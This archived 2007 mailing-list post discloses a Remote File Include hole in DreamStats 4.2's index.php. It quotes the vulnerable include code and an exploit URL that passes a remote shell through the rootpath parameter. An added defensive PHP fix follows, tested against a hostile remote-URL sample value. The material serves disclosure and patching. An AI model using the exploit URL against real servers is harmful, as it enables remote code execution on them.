[VIM] true: DreamStats V 4.2=(index.php)=>Remote File Include

str0ke str0ke at milw0rm.com
Fri Feb 2 10:13:33 EST 2007


The section that matters is lines 17-22.

<index.php>
// +---------------------------------------------+
// |     Copyright (c) 2004 – 2005 mnProjects      |
// |     http://www.mnprojects.com               |
// |     DreamStats System by Miguel Nunes       |
// +---------------------------------------------+

error_reporting(E_ALL ^ E_NOTICE);

//   D r e a m S t a t s
//
//   For Call of Duty 2 version 1.0

define('in_main', true);
define('in_dreamstats', true);

if (!isset($_GET['server'])) {

################################### Includes ###################################

@include($rootpath . 'includes/ip_vers.php');
@include($rootpath . 'includes/core.php');

That's about as vulnerable as we get.

This is for version 4.2 (4.1 and below were not downloadable), 5.0
isn't vulnerable.

/str0ke

ConTact Me:-wWw.Asb-May.Net
ScRiPt:-http://callofduty.filefront.com/file/DreamStats_System;54520
Discovered By:- ThE dE at Th <<{AsB-MaY DiScOvEr ExPlIoTs TeAm}>>
******************************************************************************
index.php:-
if (!$slots) {include($rootpath . 'html/serveroffline.php');exit;}
********************************************************************************
ExPlOiT:-http://www.Site.com/PaTh/upload/index.php?rootpath=[Shell]
********************************************************************************
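
Added example, not part of the original post and not DreamStats code: both excerpts above include files relative to a $rootpath that index.php never sets, so one fix is to pin the base path in code and include only allow-listed files that resolve under it. DS_ROOT, DS_INCLUDES and ds_resolve() are hypothetical names, and PHP 7 or later is assumed.

```php
<?php
// Added example (hypothetical names throughout), not the project's code.

// Pin the base path to this file's own directory. It is a constant, so a
// request parameter can never overwrite it (with register_globals on,
// ?rootpath=... would populate an uninitialised $rootpath global).
define('DS_ROOT', realpath(__DIR__) . DIRECTORY_SEPARATOR);

// Files index.php may pull in, relative to DS_ROOT. These three paths are
// the ones visible in the excerpts in this post.
const DS_INCLUDES = [
    'includes/ip_vers.php',
    'includes/core.php',
    'html/serveroffline.php',
];

// Return the absolute path of an allow-listed include, or throw.
function ds_resolve(string $relative): string
{
    if (!in_array($relative, DS_INCLUDES, true)) {
        throw new InvalidArgumentException("not on allow-list: $relative");
    }
    // realpath() returns false for missing files and for URL wrappers,
    // and collapses any ../ segments before the prefix check below.
    $full = realpath(DS_ROOT . $relative);
    if ($full === false || strncmp($full, DS_ROOT, strlen(DS_ROOT)) !== 0) {
        throw new RuntimeException("missing or outside root: $relative");
    }
    return $full;
}

// Constructed inputs: two names from the excerpts and one hostile value.
// Run outside a DreamStats tree, all three print "deny" (files missing).
$samples = ['includes/core.php', 'html/serveroffline.php',
            'http://example.invalid/x.txt?'];
foreach ($samples as $name) {
    try {
        // In index.php itself this would be: require ds_resolve($name);
        echo 'ok   ', ds_resolve($name), "\n";
    } catch (Exception $e) {
        echo 'deny ', $e->getMessage(), "\n";
    }
}
```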
